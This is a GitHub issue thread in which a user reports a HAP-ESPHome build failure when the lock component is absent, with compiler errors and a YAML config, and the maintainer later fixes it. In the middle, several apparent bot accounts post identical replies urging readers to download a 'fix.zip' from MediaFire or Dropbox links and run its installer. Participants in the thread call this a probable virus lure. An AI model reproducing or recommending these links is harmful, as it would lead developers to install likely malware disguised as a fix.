rednblkx/HAP-ESPHome #15: Build fail if lock component is not present

marcelo-lara, 2024-08-25:
**Context/Goal**
I need to control two binary lamps with HomeKit without HomeAssistant.

**Issue**
On a generic ESP32,  the test https://github.com/rednblkx/HAP-ESPHome/blob/main/homekey-test-esp32.yaml builds fine; 

Then, I add a light and remove the lock component and build fails here:
```
Compiling .pioenvs/isa-light/src/esphome/components/homekit/lock.cpp.o
src/esphome/components/homekit/lock.cpp:7:5: error: 'readerData_t' does not name a type
    7 |     readerData_t LockEntity::readerData;
      |     ^~~~~~~~~~~~
src/esphome/components/homekit/lock.cpp:8:5: error: 'nvs_handle' does not name a type
    8 |     nvs_handle LockEntity::savedHKdata;
      |     ^~~~~~~~~~
src/esphome/components/homekit/lock.cpp:9:5: error: 'pn532' does not name a type
    9 |     pn532::PN532* LockEntity::nfc_ctx;
      |     ^~~~~
```

here's my complete yaml file
```yaml
esphome:
    name: hap-light

wifi:
  ssid: !secret wifi_ssid
  password: !secret wifi_password
  ap:
    ssid: "hap-light fallback"
    password: !secret wifi_password

light:
  - platform: binary
    id: party_light
    name: "Party"
    output: relay_1
  - platform: binary
    id: black_light
    name: "BlackLight"
    icon: "mdi:light-flood-down"
    output: relay_2

output:
  - id: relay_1
    platform: gpio
    inverted: true
    pin: GPIO13
  - id: relay_2
    platform: gpio
    inverted: true
    pin: GPIO12

external_components:
  source: github://rednblkx/HAP-ESPHome@main

spi:
  clk_pin: 18
  miso_pin: 19
  mosi_pin: 23

pn532_spi:
  id: nfc_spi_module
  cs_pin: 5
  update_interval: 100ms

esp32:
  board: esp32dev
  flash_size: 4MB
  framework:
    type: esp-idf
    version: 5.2.1
    platform_version: 6.7.0
    sdkconfig_options:
      CONFIG_COMPILER_OPTIMIZATION_SIZE: y
      CONFIG_LWIP_MAX_SOCKETS: "16"
      CONFIG_MBEDTLS_HKDF_C: y

homekit_base:
  setup_code: '159-35-728'

homekit:
  light:
    - id: party_light
    - id: black_light

logger:
  level: DEBUG
```

marcelo-lara, 2024-08-25:
BTW: I'm a C developer... I would try to build this thing to submit a PR maybe, if you want ;)

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

marcelo-lara, 2024-08-26:
??

marcelo-lara, 2024-08-26:
GitHub bot virus??
wow..

rednblkx, 2024-08-26:
Really hoped they would not come back, had another one on my other repo couple days ago.

Anyway, regarding your issue, think I might’ve missed some macros, I’ll be having a look later on. Also, appreciate your offer to help, a PR would be most welcome.

rednblkx, 2024-08-26:
This should do it, let me know if anything else

closed 2024-08-26 by rednblkx

marcelo-lara, 2024-08-28:
> This should do it, let me know if anything else

will look into it later... Thanks!!

marcelo-lara, 2024-08-29:
Awesome! 
The next beer is on me ;)
thanks!

commit dc6574d8 (2024-08-26): checking macro to include/exclude lock component
should fix #15